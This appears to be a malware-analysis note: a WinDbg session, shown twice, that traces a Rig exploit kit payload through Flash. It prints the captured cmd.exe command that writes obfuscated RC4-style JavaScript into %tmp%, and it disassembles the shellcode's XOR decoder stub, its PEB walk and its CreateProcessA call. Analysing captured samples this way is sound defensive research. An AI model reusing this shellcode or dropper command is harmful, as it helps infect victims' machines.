brad-anton/Rig ROP Chain

## Rig ROP Chain
0:013> bp KERNEL32!CreateProcessAStub
0:022> g
Breakpoint 0 hit
eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330
eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
KERNEL32!CreateProcessAStub:
7717eb70 8bff            mov     edi,edi
0:005> da poi(esp+8)
116f00b2  "cmd.exe /q /c cd /d "%tmp%" && e"
116f00d2  "cho function O(n,g){for(var c=0,"
116f00f2  "s=String,d,D="pu"+"sh",b=[],i=[]"
116f0112  ",r=255,a=0;r+1^>a;a++)b[a]=a;for"
116f0132  "(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%"
116f0152  "g.length)^&r,d=b[a],b[a]=b[c],b["
116f0172  "c]=d;for(var e=c=a=0,S="fromChar"
116f0192  "Code";e^<n.length;e++)a=a+1^&r,c"
116f01b2  "=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]"
116f01d2  "=d,i[D](s[S](n[v](e)^^b[b[a]+b[c"
116f01f2  "]^&r]));return i[u(15)](u(11))};"
116f0212  "function H(g){var T=u(0),d=W(T+""
0:005> k
ChildEBP RetAddr
04d3b2b0 116f00a2 KERNEL32!CreateProcessAStub
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\System32\Macromed\Flash\Flash.ocx -
WARNING: Frame IP not in any known module. Following frames may be wrong.
04d3b340 52a3baf1 0x116f00a2
0:005> u 0x116f0000
116f0000 eb12            jmp     116f0014
116f0002 58              pop     eax
116f0003 31c9            xor     ecx,ecx
116f0005 66b96d05        mov     cx,56Dh
116f0009 49              dec     ecx
116f000a 80340884        xor     byte ptr [eax+ecx],84h
116f000e 85c9            test    ecx,ecx
116f0010 75f7            jne     116f0009
116f0012 ffe0            jmp     eax
116f0014 e8e9ffffff      call    116f0002
116f0019 55              push    ebp
116f001a 89e5            mov     ebp,esp
116f001c 83c4ac          add     esp,0FFFFFFACh
116f001f 53              push    ebx
116f0020 51              push    ecx
116f0021 57              push    edi
116f0022 31c0            xor     eax,eax
116f0024 648b4030        mov     eax,dword ptr fs:[eax+30h]
116f0028 8b400c          mov     eax,dword ptr [eax+0Ch]
116f002b 8b400c          mov     eax,dword ptr [eax+0Ch]
116f002e 8b00            mov     eax,dword ptr [eax]
116f0030 8b00            mov     eax,dword ptr [eax]
116f0032 8b5818          mov     ebx,dword ptr [eax+18h]
116f0035 89d8            mov     eax,ebx
116f0037 03403c          add     eax,dword ptr [eax+3Ch]
116f003a 8b5078          mov     edx,dword ptr [eax+78h]
116f003d 01da            add     edx,ebx
116f003f 8b7a20          mov     edi,dword ptr [edx+20h]
116f0042 01df            add     edi,ebx
116f0044 31c9            xor     ecx,ecx
116f0046 8b07            mov     eax,dword ptr [edi]
116f0048 01d8            add     eax,ebx
116f004a 813843726561    cmp     dword ptr [eax],61657243h
116f0050 751c            jne     116f006e
116f0052 81780b73734100  cmp     dword ptr [eax+0Bh],417373h
116f0059 7513            jne     116f006e
116f005b 8b4224          mov     eax,dword ptr [edx+24h]
116f005e 01d8            add     eax,ebx
116f0060 0fb70448        movzx   eax,word ptr [eax+ecx*2]
116f0064 8b521c          mov     edx,dword ptr [edx+1Ch]
116f0067 01da            add     edx,ebx
116f0069 031c82          add     ebx,dword ptr [edx+eax*4]
116f006c eb09            jmp     116f0077
116f006e 83c704          add     edi,4
116f0071 41              inc     ecx
116f0072 3b4a18          cmp     ecx,dword ptr [edx+18h]
116f0075 7ccf            jl      116f0046
116f0077 8d45f0          lea     eax,[ebp-10h]
116f007a 50              push    eax
116f007b 8d7dac          lea     edi,[ebp-54h]
116f007e 57              push    edi
116f007f 31c0            xor     eax,eax
116f0081 b911000000      mov     ecx,11h
116f0086 f3ab            rep stos dword ptr es:[edi]
116f0088 66c745d80101    mov     word ptr [ebp-28h],101h
116f008e c745ac44000000  mov     dword ptr [ebp-54h],44h
116f0095 50              push    eax
116f0096 50              push    eax
116f0097 50              push    eax
116f0098 40              inc     eax
116f0099 50              push    eax
116f009a 48              dec     eax
116f009b 50              push    eax
116f009c 50              push    eax
116f009d eb0e            jmp     116f00ad
116f009f 50              push    eax
116f00a0 ffd3            call    ebx ; KERNEL32!CreateProcessAStub
116f00a2 5f              pop     edi
116f00a3 59              pop     ecx
116f00a4 5b              pop     ebx
116f00a5 c1e003          shl     eax,3
116f00a8 83c006          add     eax,6
116f00ab c9              leave
116f00ac c3              ret
116f00ad e8edffffff      call    116f009f
	0:013> bp KERNEL32!CreateProcessAStub
	0:022> g
	Breakpoint 0 hit
	eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330
	eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0 nv up ei pl zr na pe nc
	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
	KERNEL32!CreateProcessAStub:
	7717eb70 8bff mov edi,edi
	0:005> da poi(esp+8)
	116f00b2 "cmd.exe /q /c cd /d "%tmp%" && e"
	116f00d2 "cho function O(n,g){for(var c=0,"
	116f00f2 "s=String,d,D="pu"+"sh",b=[],i=[]"
	116f0112 ",r=255,a=0;r+1^>a;a++)b[a]=a;for"
	116f0132 "(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%"
	116f0152 "g.length)^&r,d=b[a],b[a]=b[c],b["
	116f0172 "c]=d;for(var e=c=a=0,S="fromChar"
	116f0192 "Code";e^<n.length;e++)a=a+1^&r,c"
	116f01b2 "=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]"
	116f01d2 "=d,i[D](s[S](n[v](e)^^b[b[a]+b[c"
	116f01f2 "]^&r]));return i[u(15)](u(11))};"
	116f0212 "function H(g){var T=u(0),d=W(T+""
	0:005> k
	ChildEBP RetAddr
	04d3b2b0 116f00a2 KERNEL32!CreateProcessAStub
	*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\System32\Macromed\Flash\Flash.ocx -
	WARNING: Frame IP not in any known module. Following frames may be wrong.
	04d3b340 52a3baf1 0x116f00a2
	0:005> u 0x116f0000
	116f0000 eb12 jmp 116f0014
	116f0002 58 pop eax
	116f0003 31c9 xor ecx,ecx
	116f0005 66b96d05 mov cx,56Dh
	116f0009 49 dec ecx
	116f000a 80340884 xor byte ptr [eax+ecx],84h
	116f000e 85c9 test ecx,ecx
	116f0010 75f7 jne 116f0009
	116f0012 ffe0 jmp eax
	116f0014 e8e9ffffff call 116f0002
	116f0019 55 push ebp
	116f001a 89e5 mov ebp,esp
	116f001c 83c4ac add esp,0FFFFFFACh
	116f001f 53 push ebx
	116f0020 51 push ecx
	116f0021 57 push edi
	116f0022 31c0 xor eax,eax
	116f0024 648b4030 mov eax,dword ptr fs:[eax+30h]
	116f0028 8b400c mov eax,dword ptr [eax+0Ch]
	116f002b 8b400c mov eax,dword ptr [eax+0Ch]
	116f002e 8b00 mov eax,dword ptr [eax]
	116f0030 8b00 mov eax,dword ptr [eax]
	116f0032 8b5818 mov ebx,dword ptr [eax+18h]
	116f0035 89d8 mov eax,ebx
	116f0037 03403c add eax,dword ptr [eax+3Ch]
	116f003a 8b5078 mov edx,dword ptr [eax+78h]
	116f003d 01da add edx,ebx
	116f003f 8b7a20 mov edi,dword ptr [edx+20h]
	116f0042 01df add edi,ebx
	116f0044 31c9 xor ecx,ecx
	116f0046 8b07 mov eax,dword ptr [edi]
	116f0048 01d8 add eax,ebx
	116f004a 813843726561 cmp dword ptr [eax],61657243h
	116f0050 751c jne 116f006e
	116f0052 81780b73734100 cmp dword ptr [eax+0Bh],417373h
	116f0059 7513 jne 116f006e
	116f005b 8b4224 mov eax,dword ptr [edx+24h]
	116f005e 01d8 add eax,ebx
	116f0060 0fb70448 movzx eax,word ptr [eax+ecx*2]
	116f0064 8b521c mov edx,dword ptr [edx+1Ch]
	116f0067 01da add edx,ebx
	116f0069 031c82 add ebx,dword ptr [edx+eax*4]
	116f006c eb09 jmp 116f0077
	116f006e 83c704 add edi,4
	116f0071 41 inc ecx
	116f0072 3b4a18 cmp ecx,dword ptr [edx+18h]
	116f0075 7ccf jl 116f0046
	116f0077 8d45f0 lea eax,[ebp-10h]
	116f007a 50 push eax
	116f007b 8d7dac lea edi,[ebp-54h]
	116f007e 57 push edi
	116f007f 31c0 xor eax,eax
	116f0081 b911000000 mov ecx,11h
	116f0086 f3ab rep stos dword ptr es:[edi]
	116f0088 66c745d80101 mov word ptr [ebp-28h],101h
	116f008e c745ac44000000 mov dword ptr [ebp-54h],44h
	116f0095 50 push eax
	116f0096 50 push eax
	116f0097 50 push eax
	116f0098 40 inc eax
	116f0099 50 push eax
	116f009a 48 dec eax
	116f009b 50 push eax
	116f009c 50 push eax
	116f009d eb0e jmp 116f00ad
	116f009f 50 push eax
	116f00a0 ffd3 call ebx ; KERNEL32!CreateProcessAStub
	116f00a2 5f pop edi
	116f00a3 59 pop ecx
	116f00a4 5b pop ebx
	116f00a5 c1e003 shl eax,3
	116f00a8 83c006 add eax,6
	116f00ab c9 leave
	116f00ac c3 ret
	116f00ad e8edffffff call 116f009f